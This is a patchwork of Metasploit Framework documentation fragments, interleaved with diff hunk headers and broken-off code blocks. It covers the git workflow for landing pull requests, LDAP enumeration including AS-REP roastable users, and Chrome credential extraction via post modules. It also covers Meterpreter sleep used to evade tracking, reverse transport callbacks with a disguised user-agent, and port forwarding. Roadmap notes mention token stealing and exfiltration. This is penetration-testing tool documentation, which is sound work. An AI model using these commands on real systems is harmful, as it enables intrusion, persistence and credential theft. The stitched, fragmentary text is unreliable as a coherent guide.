A manageable strategy for dealing with outstanding PRs is to start pre-merge testing on the pull request in isolation. For example, to work on PR #1217, we would:
```
$ git checkout upstream/pr/1217
Note: checking out 'upstream/pr/1217'.
HEAD is now at 9e499e5... Make BindTCP test more robust
```
```
$ git checkout -b landing-1217
```
Now, we're on a local branch identical to the original pull request, and can move on from there. We can make our changes, isolated from master, and then either send them back to the contributor (this requires looking up the original contributor's GitHub username and branch name on GitHub), or if there aren't any changes or the changes are trivial, we can land them (if you have committer rights to Rapid7's repo, this is where you land them to the upstream repo).
This sequence does a few things after editing `.gitconfig`. It creates another copy of landing-1217 (which is itself a copy of upstream/pr/1217). Next, I push those changes to my branch (todb-r7, aka "origin"). Finally, I have a mighty [.gitconfig alias here](https://gist.github.com/todb-r7/5438391) to open a browser window to send a pull request to the original contributor's branch (you will want to edit yours to reflect your real GitHub username, of course).
I opened that in a browser, and ended up with https://github.com/schierlm/metasploit-framework/pull/1 . Once [@schierlm](https://github.com/schierlm) landed it on his branch (again, using `git merge --no-ff` and a short, informational merge commit message), all I (or anyone) had to do was `git fetch` to get the change reflected in upstream/pr/1217, and then the integration of the PR could continue.
Back to PR #1217. Turns out, my change was enough to land the original chunk of work. So, someone else ([@jlee-r7](https://github.com/jlee-r7)) was able to do something like this:
Or, if he already had upstream-master checked out:
```
$ git checkout upstream-master
$ git rebase upstream/master
$ git merge -S --no-ff --edit landing-1217
$ git push upstream upstream-master:master
```
The `--edit` is optional if we have our editor configured correctly in `$HOME/.gitconfig`. The point here is that we *always* want a merge commit, and we *never* want to use the (often useless) default merge commit message. For #1217, this was changed to:
```
Land #1217, java payload build system refactor
```
Note that you should rebase *before* landing -- otherwise, your merge commit will be lost in the rebase.
To set yourself up for signing, your .gitconfig (or metasploit-framework/.git/config) file should have these entries:
```ini
[user]
name = Your Name
email = your@email.xxx
signingkey = DEADBEEF # Must match exactly with your key for "Your Name <your@email.xxx>"
[alias]
c = commit -S --edit
m = merge -S --no-ff --edit
```
People with commit rights to rapid7/metasploit-framework will have their [[keys listed here|./Committer-Keys.md]].
The [rn-no-release-notes](https://github.com/rapid7/metasploit-framework/issues?utf8=%E2%9C%93&q=label%3Arn-no-release-notes+) label must be added if there are no release notes for the merged pull request.
# Cross-linking PRs, Bugs, and Commits
TODO: Update in this new post-Redmine, GitHub issues world
# Merge conflicts
The nice thing about this strategy is that you can test for merge conflicts straight away. You'd use a sequence like:
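A hypothetical sequence (the branch name and PR number are illustrative; `--no-commit` stops before creating a merge commit, so any conflicts can be inspected and then thrown away):
```
$ git checkout -b mc-test-1217 upstream/master
$ git merge --no-commit --no-ff upstream/pr/1217
$ git merge --abort
$ git checkout master
$ git branch -D mc-test-1217
```
If the merge applies cleanly, `git merge --abort` still works here, because `--no-commit` leaves the merge in progress rather than committing it.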
### Integration of native tool-chains
Tools like Veil, pwnlib, etc. have for a long time used native compilers and tooling to build payloads and evasions. Metasploit has opted mostly for native Ruby solutions, though it does have some implicit runtime dependencies like `apktool` for Android payload injection. However, these tools are getting harder to maintain and use (e.g. metasm has a difficult time building any non-trivial C code; we just spent a month fixing a bug it had with Ruby 2.5 and Windows). It would be nice to either be able to depend on a set of first-class toolchains being available in the environment, or to have some way to package them natively with Metasploit itself. A full suite of compilers and tools does consume considerable amounts of space (e.g. mettle's toolchain is 1.8GB uncompressed), but this is probably less of a problem than it was 15 years ago.
### Overhaul network targeting
Setting at least 5 variables RHOSTS/RPORT/SSL/VHOST/SSL_Version/User/Pass/etc... to target a single web application is very cumbersome. When these variables also do not apply to multiple RHOSTS exactly, the scheme of multiple variables falls apart further. Metasploit should be able to target URLs directly, that can all have their own independent ports, users, hostnames, etc:
```
set TARGETS https://user:password@target_app:4343 https://target_app2
```

This module has a selection of inbuilt queries which can be configured via the `ACTION` datastore option:
-`ENUM_ALL_OBJECT_CATEGORY` - Dump all objects containing any objectCategory field.
-`ENUM_ALL_OBJECT_CLASS` - Dump all objects containing any objectClass field.
-`ENUM_COMPUTERS` - Dump all objects containing an objectCategory or objectClass of Computer.
-`ENUM_CONSTRAINED_DELEGATION` - Dump info about all known objects that allow constrained delegation.
-`ENUM_DNS_RECORDS` - Dump info about DNS records the server knows about using the dnsNode object class.
-`ENUM_DNS_ZONES` - Dump info about DNS zones the server knows about using the dnsZone object class under the DC DomainDnsZones. This is needed, as without this BASEDN prefix we often miss certain entries.
-`ENUM_DOMAIN` - Dump info about the Active Directory domain.
-`ENUM_MACHINE_ACCOUNT_QUOTA` - Dump the number of computer accounts a user is allowed to create in a domain.
-`ENUM_ORGROLES` - Dump info about all known organization roles in the LDAP environment.
-`ENUM_ORGUNITS` - Dump info about all known organizational units in the LDAP environment.
-`ENUM_UNCONSTRAINED_DELEGATION` - Dump info about all known objects that allow unconstrained delegation.
-`ENUM_USER_ACCOUNT_DISABLED` - Dump info about disabled user accounts.
-`ENUM_USER_ACCOUNT_LOCKED_OUT` - Dump info about locked out user accounts.
-`ENUM_USER_ASREP_ROASTABLE` - Dump info about all users who are configured not to require kerberos pre-authentication and are therefore AS-REP roastable.
There are two ways to launch a Post module, both require an existing session.
Within a msf prompt you can use the `use` command followed by the `run` command to execute the module against the required session. For instance to extract credentials from Chrome on the most recently opened Metasploit session:
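For example (a hypothetical transcript; the module path is one of the framework's Chrome credential gatherers, and the `SESSION=-1` shorthand for the most recent session is an assumption to adapt for your environment):
```msf
msf6 > use post/windows/gather/enum_chrome
msf6 post(windows/gather/enum_chrome) > run SESSION=-1
```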
There are two main ports for SMB:
- 139/TCP - Initially Microsoft implemented SMB on top of their existing NetBIOS network architecture, which allowed Windows computers to communicate across the same network
- 445/TCP - Newer versions of SMB use this port, where NetBIOS is not used.
All of these examples assume you are in a Meterpreter session. To see the latest help information run `help reg`:
```msf
meterpreter > help reg
Usage: reg [command] [options]
Interact with the target machine's registry.
```
Registry keys must be escaped correctly. Windows registry keys are escaped with backslashes. In msfconsole, backslashes and spaces have a special meaning, which means you will need to escape these characters for your key to work as expected.
```msf
# Valid: Using single quotes around the registry key
```
If this is problematic either [[upgrade your session to Meterpreter|./Metasploit-Guide-Upgrading-Shells-to-Meterpreter.md]], or specify the `-w` flag which will impact the result of queries:
In the case of HTTP/S transports, some resiliency features were present. Thanks to its stateless nature, HTTP/S transports would continue to attempt to talk to Metasploit after network outages or other unexpected problems as each command request/response is transmitted over a fresh connection. TCP based transports had nothing that would attempt to reconnect should some kind of network issue occur.
Revamped [[transport|./Meterpreter-Transport-Control.md]] implementations have provided support for resiliency even for TCP based communications. Any session that isn't properly terminated by Metasploit will continue to function behind the scenes while Meterpreter attempts to re-establish communications with Metasploit.
It is also possible to control the behaviour of this functionality a little via the various timeout values that can be specified when adding transports to the session, and also on the fly for the current transport. For full details on those timeout values, please see the [[timeout documentation|./Meterpreter-Timeout-Control.md]].
The interface to the sleep command looks like this:
```msf
meterpreter > sleep
Usage: sleep <time>
shut down and restarted after the designated timeout.
```
As shown, `sleep` expects to be given a single positive integer value that represents the number of seconds that Meterpreter should be silent for. When run, the session will close, and then callback after the elapsed period of time. Given that Meterpreter lives in memory, this lack of communication will make it extremely difficult to track.
The following shows a sample run where Meterpreter is put to sleep for 20 seconds, after which the session reconnects while the handler is still in background:
```msf
meterpreter > sleep 20
[*] Telling the target instance to sleep for 20 seconds ...
[+] Target instance has gone to sleep, terminating current session.
```
It's hard to believe it possible, but in this case the following output could be considered a nightmare.
```msf
[*] Sending stage (173056 bytes) to xxx.xxx.xxx.xxx
[*] Meterpreter session 4684 opened ....
[*] Sending stage (173056 bytes) to xxx.xxx.xxx.xxx
```
1. Loads the extension DLL into memory.
1. Calculates the size of the DLL.
1. Writes the size of the DLL as a 32-bit value to the configuration block.
1. Writes the entire body of the DLL, as-is, to the end of the configuration block.
Once the end of the list of extensions is reached, the last thing that is written to the payload buffer is a 32-bit representation of `0` (`NULL`) which indicates that the list of extensions has been terminated. This `NULL` value is what `metsrv` will look for when iterating through the list of extensions so that it knows when to stop. After this, any extension initialisation scripts are wired in (though that's beyond the scope of this article).
At this point, all of the pre-loaded extensions have been loaded into Meterpreter and are available for use. However, Metasploit is yet to know about them. To initiate client-side wiring of any of the pre-loaded extensions, the user can just type `use <extension>` just like they used to. Metasploit will check to see if the extension already exists in the target instance, and if it does, it will skip the extension upload and just wire-up the functions on the client side. If the extension is missing, then it will upload it and wire-up the functions on the fly just like it always has done.
If you're working with `meterpreter_reverse_https`, you'll notice that when new shells come in they appear just like an orphaned instance. This is expected behaviour, because a stageless session can't and won't look any different to an old session that hasn't been in touch with Metasploit for a while.
With `TCP` transports, communication "times out" when the time between the last packet and the current socket poll is greater than the communications timeout value. This happens when there are network related issues that prevent data from being transmitted between the two endpoints, but doesn't cause the socket to completely disconnect. With `HTTP/S` transports, the communication "times out" for the same reason, but the evaluation of the condition is slightly different in that failure can occur because there is either no response at all from the remote server, or the response to a `GET` request results in no acknowledgement.
By default, this value is set to `300` seconds (`5` minutes), but can be overridden by the user via the `SessionCommunicationTimeout` setting.
If connectivity fails, or the communication is deemed to have timed out, then the current transport is destroyed and the next transport in the list of transports is invoked. From there, Meterpreter will use the Retry Total and Retry Wait values while attempting to re-establish a session with Metasploit.
#### Retry Total and Retry Wait
After a transport initialises inside Meterpreter, Meterpreter uses this transport to attempt to establish a new session with Metasploit. In some cases, Metasploit might not be available due to reasons like bad network connectivity, or a lack of configured listeners. If Meterpreter can't connect to Metasploit, it will attempt to retry for a period of time. Once that period of time expires, Meterpreter will deem this transport "dead" and will move to the next one in the transport list.
The total amount of time that Meterpreter will attempt to connect back to Metasploit on the given transport is indicated by the `retry total` value. That is, `retry total` is the total amount of time that Meterpreter will retry communication on the transport. The default value is `3600` seconds (`1` hour), and can be overridden via the `SessionRetryTotal` setting.
Meterpreter supports the querying and updating of each of these timeouts via the console. In order to get the current timeout settings, users can invoke the `get_timeouts` command, which returns all four of the current timeout settings (one for the global session, and three for the transport-specific settings). An example of which is shown below:
```msf
meterpreter > get_timeouts
Session Expiry : @ 2015-06-09 19:56:05
Comm Timeout : 100000 seconds
```
In order to update these values, users can invoke the `set_timeouts` command. Invoking it without parameters shows the help:
```msf
meterpreter > set_timeouts
Usage: set_timeouts [options]
OPTIONS:
-h Help menu
-t <opt> Retry total time (seconds)
-w <opt> Retry wait time (seconds)
-x <opt> Expiration timeout (seconds)
```
As the help implies, each of these settings takes a value that indicates the number of seconds. Each of the options of this command is optional, so the user can update only those values that they are interested in updating. When the command is invoked, Meterpreter is updated, and the result shows the updated values once the changes have been made.
The following example updates the session expiration timeout to be `2` minutes from "now", and changes the retry wait time to `3` seconds:
```msf
meterpreter > set_timeouts -x 120 -t 3
Session Expiry : @ 2015-06-02 22:45:13
Comm Timeout : 100000 seconds
Retry Wait Time : 2500 seconds
```
This command can be invoked any number of times while the session is valid, but as soon as the session has expired, Meterpreter will shut down and it's game over:
```msf
meterpreter >
[*] 10.1.10.35 - Meterpreter session 2 closed. Reason: Died
@@ -26,7 +26,7 @@ Meterpreter has a new base command called `transport`. This is the hub of all tr
The following output shows the current help text for the `transport` command:
```msf
meterpreter > transport
Usage: transport <list|change|add|next|prev|remove> [options]
@@ -48,7 +48,7 @@ OPTIONS:
-T <opt> Retry total time (seconds) (default: same as current session)
-U <opt> Proxy username for HTTP/S transports (optional)
-W <opt> Retry wait time (seconds) (default: same as current session)
-X <opt> Expiration timeout (seconds) (default: same as current session)
-c <opt> SSL certificate path for https transport verification (optional)
-h Help menu
-i <opt> Specify transport by index (currently supported: remove)
@@ -65,7 +65,7 @@ OPTIONS:
The simplest of all the sub-commands in the `transport` set is `list`. This command shows the full list of currently enabled transports, and an indicator of which one is the "current" transport. The following shows the non-verbose output with just the default transport running:
```msf
meterpreter > transport list
Session Expiry : @ 2015-06-09 19:56:05
@@ -82,7 +82,7 @@ The above output shows that we have one transport enabled that is using `TCP`. W
The verbose version of this command shows more detail about the transport, but only in cases where extra detail is available (such as `reverse_http/s`). The following command shows the output of the `list` sub-command with the verbose flag (`-v`) after an `HTTP` transport has been added:
```msf
meterpreter > transport list -v
Session Expiry : @ 2015-06-09 19:56:05
@@ -98,7 +98,7 @@ Adding transports gives Meterpreter the ability to work on different transport m
The following command shows a simple example that adds a `reverse_http` transport to an existing Meterpreter session. It specifies a custom communications timeout, retry total and retry wait, and also specifies a custom user-agent string to be used for the HTTP requests:
```msf
meterpreter > transport add -t reverse_http -l 10.1.10.40 -p 5105 -T 50000 -W 2500 -C 100000 -A "Totes-Legit Browser/1.1"
[*] Adding new transport ...
[+] Successfully added reverse_http transport.
@@ -127,7 +127,7 @@ It is also possible to specify the following:
The following shows another example which adds another `reverse_tcp` transport to the transport list:
```msf
meterpreter > transport add -t reverse_tcp -l 10.1.10.40 -p 5005
[*] Adding new transport ...
[+] Successfully added reverse_tcp transport.
@@ -155,7 +155,7 @@ The three different ways to change transports are:
As an example, here is the current transport setup:
From here, moving backward sends Meterpreter back to the `reverse_http` listener:
```msf
meterpreter > transport prev
[*] Changing to previous transport ...
@@ -252,7 +252,7 @@ The command is similar to `add` in that it takes a subset of the parameters, and
* `-p` - The `LPORT` value.
* `-u` - This value is only required for `reverse_http/s` transports and needs to contain the URI of the transport in question. This is important because there might be multiple listeners on the same IP and port, so the URI is what differentiates each of the sessions.
```msf
[*] Starting interaction with 2...
meterpreter > transport list
@@ -282,7 +282,7 @@ Previously, Meterpreter only had built-in resiliency in the `HTTP/S` payloads an
The following shows Metasploit being closed and leaving the existing `TCP` session running behind the scenes:
```msf
meterpreter > transport list
Session Expiry : @ 2015-06-09 19:56:05
@@ -301,7 +301,7 @@ With Metasploit closed, the Meterpreter session has detected that the transport
The following output shows Metasploit being re-launched with the appropriate listeners, and the existing Meterpreter instance establishing a session automatically:
@@ -63,7 +63,7 @@ Related open tickets (slightly broader than Meterpreter):
* PrependTokenSteal / PrependEnvironmentSteal: Basically, with proxies and other perimeter defenses, being SYSTEM doesn't work well. This would be an addition to a payload that would work to execute as SYSTEM but would then locate a logged-in user and steal their environment to call back to the handler. Very useful when pivoting around with PSEXEC
* Binary installed death dates: A way of putting a date in a binary after which the binary no longer functions would be useful, and could possibly even perform self-deletion. Time zones would be a tricky matter, but that is something handled by many programmers already (probably just not in shellcode)
* Allow Meterpreter sessions to resolve L3 addresses (#4793)
* Track whether or not the current session has admin credentials (#4633)
* Support Metasploit-side zlib compression of sessions
* Being able to use Meterpreter instances to easily forward commands & exfil
One of the most important things to learn when first working with Metasploit is how to navigate Metasploit's codebase. However, it's often not immediately clear how this should be done. This page aims to explain some of the different approaches that one can take when navigating Metasploit's codebase and provides a primer for learning how Metasploit's codebase is structured.
A quick reminder before we get started: one can always access the Metasploit Slack at <https://metasploit.slack.com/>. Normally this page should allow you to sign up; however, if for any reason you cannot, feel free to shoot an email to msfdev *at* rapid7 *dot* com and we will be happy to send you an invite link.
# Metasploit Code Structure
A great outline of Metasploit's code structure can be found at <https://www.offensive-security.com/metasploit-unleashed/metasploit-architecture/>, which should be referred to for an overview. To repeat what is said there, these are the main subdirectories:
* **data** - Our general data storage area. Used to store wordlists for use by modules, binaries that are used by exploits, images, and more.
@@ -23,25 +23,136 @@ A great outline of Metasploit's code structure can be found at <https://www.offe
* **scripts** - Stores various scripts used within Metasploit, such as Meterpreter, and scripts for the console interface of Metasploit Framework.
* **spec** - Contains various RSpec checks that are used to ensure libraries and core functionality within the framework are working as expected. If you are writing a new library or adjusting one, you may need to update the corresponding RSpec file within this directory to ensure the specification checks are updated to reflect the new behavior.
* **test** - Contains tests for various parts of Metasploit code to ensure they are operating as expected.
* **tools** - Contains various tools that may be helpful under different situations. The `dev` directory contains tools useful during development, such as `tools/dev/msftidy_docs.rb` which helps ensure your documentation is in line with standards.
# Code Navigation Tools
## GitHub Code Navigation
You can search through the code of Metasploit using GitHub with searches such as <https://github.com/rapid7/metasploit-framework/search?l=Ruby&q=%22payload.arch%22&type=code>. Note that double quotes are required to match specifically on a certain term; in the previous example this term was `payload.arch`. You can also set the `type=code` parameter to specifically match only on code results; this can be set to `commits` or `issues` if you want to search commits or issues instead. Finally, notice that when searching code, it's important to also specify the language of the files you want to match. In the case above I made it so that my results would only match on files deemed by GitHub to contain Ruby code, however you can also specify other languages such as Batch or C if you want those languages instead. You can even remove the language restriction if you find your search results are too narrow.
Another incredibly useful feature of GitHub is the ability to search across all repositories that an organization owns. This is especially useful in Metasploit as certain components, such as Rex code and payload code, may be contained in repositories other than `metasploit-framework`. To search across the public repositories that Rapid7 owns, use a search such as <https://github.com/search?q=org%3Arapid7+%22payload.arch%22&type=code>. Note the presence of the `org:rapid7` tag within the previous URL: this tells GitHub to look through all repositories that Rapid7 owns for the term `payload.arch` within any code files.
Experiment with these results and play around with GitHub searches more. Over time you will learn where it is useful and where it has its limitations and will be able to determine when it might be better to use an IDE to help understand a piece of code more.
## SourceGraph Code Navigation
A better way to navigate code, particularly across repos, and also find out where things are defined using an easy to use interface, is SourceGraph from
<https://sourcegraph.com>. The interface is not hard to use and you can find several tutorials over at <https://docs.sourcegraph.com/tutorials> on how to use it.
The main benefit of SourceGraph over GitHub is the ability to search all known repositories at once and then easily jump between definitions using either the
online search at <https://sourcegraph.com/search>, or the GitHub integrated browser plugin from <https://docs.sourcegraph.com/integration/browser_extension> to allow
easy navigation of Metasploit and Rapid7 code from your GitHub PR reviews.
It is also recommended to review the tutorials to better understand some of the advanced search capabilities of SourceGraph, as they provide some useful search functionality that is not available in GitHub or may be harder to perform there.
# IDE Code Navigation
## RubyMine Code Navigation
One of the best ways to navigate the codebase within Metasploit is to use RubyMine, available from <https://www.jetbrains.com/ruby/>. Whilst it is a paid tool, it offers a variety of neat reference-finding features, such as the ability to right-click on a method name and select `Find Usages`, or to right-click the method name and select `Go To -> Declaration or Usages` to find all the locations where that method might have been defined within the codebase, which can make tracing complex definitions that wind between library and module code much easier. RubyMine also offers autocompletion and integrates well with many tools, such as Git to allow you to quickly switch branches, and RuboCop to help provide suggestions on where your code style could be improved.
For a cheaper option one can also use VS Code. Note, however, that VS Code does not have the best tab completion and will not allow you to trace references. If you're willing to put up with this, it is a much faster and more lightweight product than RubyMine, which makes it great for those times when you just need to edit a piece of code without loading a bunch of related files that you don't need to reference or edit. It also has great regex search features that work much faster than RubyMine's, allowing you to search the codebase a lot quicker, as RubyMine will often seem to stutter due to its larger overhead.
Ultimately though the tool that you pick should be up to you. Some may prefer to work with vim/nano/emacs or some other command line editor over a GUI interface. Use whatever you can afford and feels comfortable to you!
## SolarGraph Code Navigation - VSCode
We'd be remiss not to mention SolarGraph as a potential plugin that one can use to navigate code within VSCode. This tool
provides a lot of the autocomplete and IntelliSense functionality you might get from dedicated IDEs such as RubyMine, within
VSCode itself. The tool can be installed by running `gem install solargraph-rails` for the Rails integrations, which will
also in turn install `solargraph` itself. If you just want SolarGraph without the Rails integrations, run `gem install solargraph`.
The configuration file for SolarGraph itself can be found at `.solargraph.yml` within the root directory of Metasploit Framework.
For more information on how this works and how to tweak it, please refer to <https://solargraph.org/guides/configuration>.
Once the Gem files have been installed, the next step is to install the VSCode plugin. You can grab it from
<https://marketplace.visualstudio.com/items?itemName=castwide.solargraph>. Once this is done, run the following commands
to ensure that SolarGraph is using the most up to date information about your code:
```
bundle install # Update all the gems
yard gems # Create documentation files for all the gems. SolarGraph relies on YARD for a lot of info.
yard doc -c # Create YARD docs for all files and use the cache so we don't repeat work (-c option).
solargraph bundle # Update Solargraph documentation for bundled gems
```
Then close down VSCode and restart it again, opening up the `metasploit-framework` directory again as a project if needs be.
This should result in the SolarGraph server starting and then taking a few minutes to index your files. Note that this
process may occur every time you open up the `metasploit-framework` project. This is normal and to be expected.
If you'd like to save yourself some time, you can have YARD automatically generate new documentation for installed Gems
by running `yard config --gem-install-yri` which will configure YARD to automatically generate documentation whenever
new Gems are installed.
# Debugging Metasploit
## Pry Debugging
Occasionally, simply reading through Metasploit code may not be helpful. You need to actually get into the weeds and learn
what a piece of code is doing. In these cases, it may be helpful to use `pry`, a Ruby Debugger that can be launched at
a specific place within your code and which allows you to view the state of the program at that time,
make adjustments as needed, and then either step through the program or continue to let it run.
You can enter into an interactive debugging environment using `pry` by adding the following code
snippet within your Metasploit module or library method:
```ruby
require 'pry'; binding.pry
```
Pry includes inbuilt commands for code navigation:
- `backtrace`: Show the current call stack
- `up` / `down`: Navigate the call stack
- `step`: Move forward by a single execution step
- `next`: Move forward by a single line
- `whereami`: Show the current breakpoint location again
- `help`: View all of the available commands and options
Ruby's runtime introspection can be used to view the available methods, classes, and variables within the current Ruby environment:
- `self`: To find out what the current object is
- `self.methods`: Find all available methods
- `self.methods.grep /send/`: Searching for a particular method that you're interested in. This can be great to explore unknown APIs.
- `self.method(:connect).source_location`: Find out which file, and which line, defined a particular method
- `self.class.ancestors`: For complex modules, this can be useful to see what mixins a Metasploit module is currently using
To learn more about Pry, we recommend reading GitLab's guide at <https://docs.gitlab.com/ee/development/pry_debugging.html>.
## Debug.gem Debugging
Ruby 3.1 and later come with `debug.gem` installed automatically, which is the new default debugger for Ruby. It replaces
the old `lib/debug.rb` library that was not actively being maintained and replaces it with a modern debugging library
capable of performing many debugging actions with next to no impact on the performance of the debugged application.
Whilst RubyMine does not support the `debug.gem` functionality, you can use VSCode to take advantage of `debug.gem`
to get speedy debugging of Ruby scripts from within VSCode itself. Simply install the debugging plugin
from <https://marketplace.visualstudio.com/items?itemName=KoichiSasada.vscode-rdbg>, then go to the Metasploit root directory,
and if you have Bundler installed, run `bundle install`. This will bring in the latest version of the `debug` gem.
Once this is all done, open the `metasploit-framework` folder from a cloned GitHub copy of Metasploit Framework in VSCode
by using `File->Open Folder`. Then click `Run->Add Configuration->Ruby(rdbg)`. This will create a file at
`<metasploit root>/.vscode/launch.json`. Replace the contents of this file with the contents of the file at
<https://github.com/rapid7/metasploit-framework/blob/master/external/vscode/launch.json>. If you wish, you can
optionally change the listening port from `55634` in the script to one of your choice.
Finally click `Run->Start Debugging` to start debugging Metasploit Framework using VSCode. This may cause a prompt to
appear that looks like `bundle exec ruby /home/tekwizz123/git/metasploit-framework/msfconsole`. Confirm this looks okay
and that you are using `bundle exec ruby` to execute `msfconsole`. If all looks good, hit the `ENTER` key to confirm.
At this point you should see Metasploit Framework open up.
If you want to prevent this prompt in the future then simply remove the `"askParameters": true,` line from `launch.json`.
Once in a debugging session, debug.gem supports the same commands as Pry in many cases, so the commands listed in the
Pry section above should work in the same manner. Additionally, debug.gem supports extra commands for things such as
tracing data. For more details refer to the command list at <https://github.com/ruby/debug#debug-command-on-the-debug-console>
which provides a detailed list of debug.gem's supported commands. For more information on the VSCode rdbg plugin,
refer to <https://code.visualstudio.com/docs/languages/ruby> and <https://marketplace.visualstudio.com/items?itemName=KoichiSasada.vscode-rdbg>.
## RubyMine Debugging
RubyMine comes with its own built in debugger that is based off of the old `lib/debug.rb` library in Ruby, however it
has custom patches and modifications applied to it by the JetBrains team. To set it up, first clone the Git repository
for Metasploit-Framework locally, then go `File->Open` and click on the `metasploit-framework` folder to open it as a project.
Once this is done, go to `Run->Edit Configurations` and click the plus sign to add a new configuration. Select
`Ruby`, and in the name field, enter a name that makes sense for you, such as `Metasploit Debug`. Under `Ruby Script`,
enter the full path to `msfconsole` on your local machine. Finally, set the SDK to either `Use Project SDK` or select
another Ruby SDK that RubyMine recognizes.
You can add a Ruby SDK by going to `File->Settings->Languages and Frameworks->Ruby SDK and Gems` and clicking the plus sign.
@@ -33,7 +33,7 @@ If you downloaded Metasploit from us, there is no cause for alarm. We pride our
### Windows silent installation
The PowerShell below will download and install the framework, and is suitable for automated Windows deployments. Note that the installer will be downloaded to `$DownloadLocation` and won't be deleted after the script has run.
InstantClient 10 is recommended to allow you to talk with version 8, 9, 10, and 11 servers.
Go to <https://www.oracle.com/database/technologies/instant-client/downloads.html> and select the link corresponding to your UNIX PC's architecture. Example for Linux x64, use the Instant Client for Linux x86-64 link, which should take you to <https://www.oracle.com/database/technologies/instant-client/linux-x86-64-downloads.html>
All right so that's one way, but what if we wanted to do this manually? First off to flush all routes from the routing table, we will do `route flush` followed by `route` to double check we have successfully removed the entries.
```msf
msf6 post(multi/manage/autoroute) > route flush
@@ -290,7 +290,7 @@ Active sessions
#### Local Port Forwarding
To set up a port forward using Metasploit, use the `portfwd` command within a supported session's console such as the Meterpreter console. Using `portfwd -h` will bring up a help menu similar to the following:
To add a port forward, use `portfwd add` and specify the `-l`, `-p` and `-r` options at a minimum to specify the local port to listen on, the remote port to connect to, and the target host to connect to, respectively.
[*] Local TCP relay created: :1090 <-> 169.254.37.128:443
meterpreter >
@@ -338,7 +338,7 @@ Note that you may need to edit your `/etc/hosts` file to map IP addresses to giv
#### Listing Port Forwards and Removing Entries
You can list port forwards using the `portfwd list` command. To delete all port forwards, use `portfwd flush`. Alternatively, to selectively delete local port forwarding entries, use `portfwd delete -l <local port>`.
```msf
meterpreter > portfwd delete -l 1090
[*] Successfully stopped TCP relay on 0.0.0.0:1090
meterpreter > portfwd list
@@ -355,7 +355,7 @@ To set up a reverse port forward, use `portfwd add -R` within a supported sessio
For example, to listen on port 9093 on a target session and have it forward all traffic to the Metasploit machine at 172.20.97.72 on port 9093, we could execute `portfwd add -R -l 4444 -L 172.20.97.73 -p 9093` as shown below, which would then cause the machine we have a session on to start listening on port 9093 for incoming connections.
@@ -11,12 +11,12 @@ Unfortunately, at this point in time the extension only works inside x86 and x64
# Usage
As with any other extension that comes with Meterpreter, loading it is very simple:
```msf
meterpreter > use python
Loading extension python...success.
```
Once loaded, the help system shows the commands that come with the extension:
```msf
meterpreter > help
... snip ...
@@ -36,7 +36,7 @@ Each of these commands is discussed in detail below.
## python_execute
The `python_execute` command is the simplest of all commands that come with the extension, and provides the means to run single-shot lines of Python code, much in the same way that the normal Python interpreter functions from the command-line when using the `-c` switch. The full help for the command is as follows:
```msf
meterpreter > python_execute -h
Usage: python_execute <python code> [-r result var name]
@@ -50,13 +50,13 @@ OPTIONS:
-r <opt> Name of the variable containing the result (optional)
```
A very simple example of this command is shown below:
```msf
meterpreter > python_execute "print 'Hi, from Meterpreter!'"
[+] Content written to stdout:
Hi, from Meterpreter!
```
Notice that any output that is written to stdout is captured by Meterpreter and returned to Metasploit so that it's visible to the user. This also happens for anything written to stderr, as shown below:
```msf
meterpreter > python_execute "x = x + 1"
[-] Content written to stderr:
Traceback (most recent call last):
@@ -66,25 +66,25 @@ NameError: name 'x' is not defined
This handy feature not only allows users to see the output of their scripts, but it also means that any errors are completely visible too.
A more interesting example can be seen below:
```msf
meterpreter > python_execute "x = [y for y in range(0, 20) if y % 5 == 0]"
[+] Command executed without returning a result
```
The command above executes, but nothing was printed to stdout, or to stderr, and hence nothing was captured.
The good thing is that the Python extension is persistent across calls. This means that after the above command is executed, `x` is still present in the interpreter and can be accessed with another call:
```msf
meterpreter > python_execute "print x"
[+] Content written to stdout:
[0, 5, 10, 15]
```
As useful as this is, developers may want to produce post-modules that make use of the data that a Python script has generated. Parsing stdout is not ideal in such a scenario, and hence this command provides the means for individual variables to be extracted directly using the `-r` parameter, as described by the help:
```msf
meterpreter > python_execute "x = [y for y in range(0, 20) if y % 5 == 0]" -r x
[+] x = [0, 5, 10, 15]
```
Note that this command requires the first parameter to be a string that contains code that needs to be executed. However, this string can be blank, resulting in no code being executed. This means that extraction of content generated in previous calls is still possible without executing more code, or rerunning previous code snippets just to make use of the `-r` parameter:
```msf
meterpreter > python_execute "" -r x
[+] x = [0, 5, 10, 15]
```
@@ -95,7 +95,7 @@ Sometimes, single-line execution isn't enough, or is cumbersome. The `python_imp
## python_import
This command allows for whole modules to be loaded from the attacker's machine and uploaded to the target interpreter. The full help is shown below:
```msf
meterpreter > python_import -h
Usage: python_import <-f file path> [-n mod name] [-r result var name]
@@ -114,8 +114,8 @@ OPTIONS:
Importing of module trees is still considered a _beta_ feature, but we encourage you to use it where possible and keep us informed of any issues you may face.
Consider the following script:
```python
# $ cat /tmp/drives.py
import string
from ctypes import windll
@@ -133,7 +133,7 @@ result = get_drives()
print result
```
The aim of this is to determine all the local logical drives and put the letters into a list. From there it prints that list to screen. The result of running the script is as follows:
```msf
meterpreter > python_import -f /tmp/drives.py
[*] Importing /tmp/drives.py ...
[+] Content written to stdout:
@@ -146,7 +146,7 @@ This command is also intended to allow for recursive loading of modules from the
## python_reset
It may get to a point where the content of the interpreter needs to be flushed. The `python_reset` command clears out all imports, libraries and global variables:
```msf
meterpreter > python_execute "x = 100"
[+] Command executed without returning a result
meterpreter > python_execute "print x"
@@ -244,7 +244,7 @@ It is not possible to delete transports using the python extension as this opens
@@ -8,18 +8,18 @@ Clone a new metasploit-framework.git repository:
Go there and check out every remote branch we've got. That way, if you screw up and delete something important, you can add it back in later from this backup clone.
```
todb@presto:~/github/todb-r7$ cd msf-backup.git
todb@presto:~/github/todb-r7/metasploit-framework$ for b in `git branch -r | grep -v "HEAD -> origin" | sed 's/^ origin\///'`; do git checkout -b $b --track origin/$b; done
```
Tarball it out of the way.
```
todb@presto:~/github/todb-r7$ cd ..
todb@presto:~/github$ tar zcvf msf-backup.git.tar.gz msf-backup.git
todb@presto:~/github$ rm -rf msf-backup.git
```
# Make a new clone
@@ -35,10 +35,10 @@ First, wipe out anything that responds to prune. Usually that's not a lot.
Next, take a look at what's already merged and what's not. We can drop most of the merged stuff right away.
```
mazikeen:./msf-prune$ git branch -r --merged
mazikeen:./msf-prune$ git branch -r --no-merged
```
That gives a pretty good idea of how many branches we're talking about.
@@ -46,21 +46,21 @@ That gives a pretty good idea of how many branches we're talking about.
Here's a one-liner, lightly modified from http://stackoverflow.com/questions/2514172/listing-each-branch-and-its-last-revisions-date-in-git#2514279 which lists all remote **merged** branches in date order.
```
